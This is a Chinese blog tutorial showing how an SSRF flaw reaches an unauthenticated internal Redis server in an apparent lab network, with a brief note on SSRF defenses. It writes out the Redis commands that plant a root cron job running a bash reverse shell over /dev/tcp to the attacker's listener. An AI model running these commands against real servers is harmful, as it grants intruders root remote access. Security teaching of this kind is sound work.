首页 > 数据库 >实战篇——SSRF漏洞Redis反弹shell实战

实战篇——SSRF漏洞Redis反弹shell实战

时间:2024-07-10 21:53:13浏览次数:17  
标签:实战篇 shell SSRF Redis 端口 漏洞 反弹

实战篇——SSRF漏洞Redis反弹shell实战

SSRF之Redis实战

上一章中利用file伪协议实现了内网的主机探测,发现存在192.168.118.151,对其进行端口探测:

image-20240710210756305

可见开放了6379端口,结合响应判断为Redis服务。

Redis存在未授权访问漏洞,可以利用该漏洞实现信息泄露、数据删除以及反弹shell,下面演示通过SSRF实现Redis反弹shell获取内网服务器权限。

先做一下准备工作,在操作机上使用nc监听6666端口:

image-20240710211616768

首先设置工作目录为定时任务目录,这样就可以实现定时发送连接请求:

config set dir /var/spool/cron

由于此处Redis指令作为SSRF请求参数,因此需要进行两次url编码:

image-20240710211902424

其次创建root的定时任务文件,这样可以确保反弹的shell是最高权限:

config set dbfilename root

image-20240710212307818

然后创建每分钟反弹shell的定时任务

set x "\n* * * * * /bin/bash -i 0>/dev/tcp/192.168.118.134/6666 1>&0 2>&0\n"

image-20240710212758787

最后保存

image-20240710212845088

成功反弹shell:

image-20240710213144938

SSRF的防御

1.限制可以访问的协议和端口,仅允许必要的协议(如HTTP、HTTPS)和端口(如 80、443)。

2.对内部服务器应答的信息进行检测和过滤,防止敏感信息的泄露。

标签:实战篇,shell,SSRF,Redis,端口,漏洞,反弹
From: https://www.cnblogs.com/yaoguyuan/p/18295089

相关文章

  • 实战篇——SSRF漏洞RCE实战
    实战篇——SSRF漏洞RCE实战SSRF的原理攻击者利用外部服务器对请求资源未作限制的缺陷,构造特定的请求实现内网渗透。SSRF之RCE实战代码审计:此处未对url作任何的过滤或验证,因此存在SSRF漏洞。利用file伪协议读取文件,实现内网主机探测:利用dict伪协议探测192.168.118.150的......
  • Linux-shell编程入门基础
    目录前言Shell编程bash特性shell作用域变量环境变量$特殊变量$特殊状态变量$特殊符号(很重要)其他内置shell命令shell语法的子串截取统计指令执行时间练习shell特殊扩展变量父子shell的理解内置和外置命令区别数值计算双括号(())运算letexprexpr模式匹配bcawk中括号shell的条件判......
  • Shell实战之SSH+Shell脚本实现远程控制多主机
    问题引入我在学习Hadoop,Spark等框架时,发现配置伪分布式环境时经常需要同时控制多台主机,Moba自带的MultiExec并不适合同时控制4台以上的主机。因此我自己设计了一段简单的shell脚本实现了这一功能。准备在使用这个脚本之前需要预先实现集群间的IP地址映射vim/etc/hosts按......
  • python执行shell并获取结果
    在Python中执行Shell命令并获取其结果,通常可以使用subprocess模块。这个模块允许我们启动新的进程,连接到它们的输入/输出/错误管道,并获取它们的返回码。下面是一个详细的示例,展示了如何使用subprocess.run()函数来执行Shell命令并获取其输出。1.示例一:使用subprocess.run()执行......
  • 常见webshell管理工具流量分析
    1.蚁剑蚁剑设置代理后bp抓包,bp看流量方便一点默认编码器流量分析进入文件管理器的两个数据包:解码后的数据为:7=@ini_set("display_errors","0");@set_time_limit(0);functionasenc($out){return$out;};functionasoutput(){$output=ob_get_contents();ob_end_clean();e......
  • python执行shell并获取结果
    在Python中执行Shell命令并获取其结果,通常可以使用subprocess模块。这个模块允许我们启动新的进程,连接到它们的输入/输出/错误管道,并获取它们的返回码。下面是一个详细的示例,展示了如何使用subprocess.run()函数来执行Shell命令并获取其输出。1.示例一:使用subprocess.run()执行l......
  • XShell配置快捷键Ctrl+C和Ctrl+V
    XShell的校园版是一款免费的ssh连接工具,使用范围很广,特别是ShtermClient也把其作为一款默认连接工具。但是,平时工作中的一些习惯的快捷键,还是需要自己进行配置的。进入工具->选项->键盘和鼠标->编辑->新建,按Ctrl+C快捷键,类型选择菜单,菜单选择复制,点击确定,设置成功。Ctrl+V也按照......
  • Shell - /dev/null是什么意思?
    /dev/null是什么意思在Unix和类Unix操作系统(包括Linux)中,/dev/null是一个特殊的文件,被称为“空设备”或“空设备文件”。这个文件会丢弃所有写入到它的数据,就好像一个黑洞一样。当你读取/dev/null时,它立即返回一个文件结束(EOF)标记。在命令行操作中,/dev/null常常被用来丢弃不需要......
  • 在 PowerShell 中,你可以使用一些命令来管理打印机驱动的导入和导出操作。通过这些 Pow
    更高级的PowerShell自动化打印机迁移,可以考虑以下步骤和技术:自动化打印机迁移流程批量导出和导入打印机配置使用PowerShell脚本批量导出和导入多个打印机的配置。可以结合循环和数组来处理多个打印机。powershellCopyCode#批量导出打印机配置$printers=Get-Printe......
  • 生产实习--启明星辰 第四天(Web网络安全基础知识,sql注入,xss攻击,csrf与ssrf,xxe攻击,未授
    web安全的基础知识基本定义Web安全,也称为网络安全或在线安全,是指保护网站、网页和Web服务免受各种威胁和攻击的技术和实践。这些威胁可能来自恶意软件、网络攻击、数据泄露、身份盗窃、服务中断等。Web安全的目标是确保Web应用程序和用户数据的安全、完整和可用性。一般流程......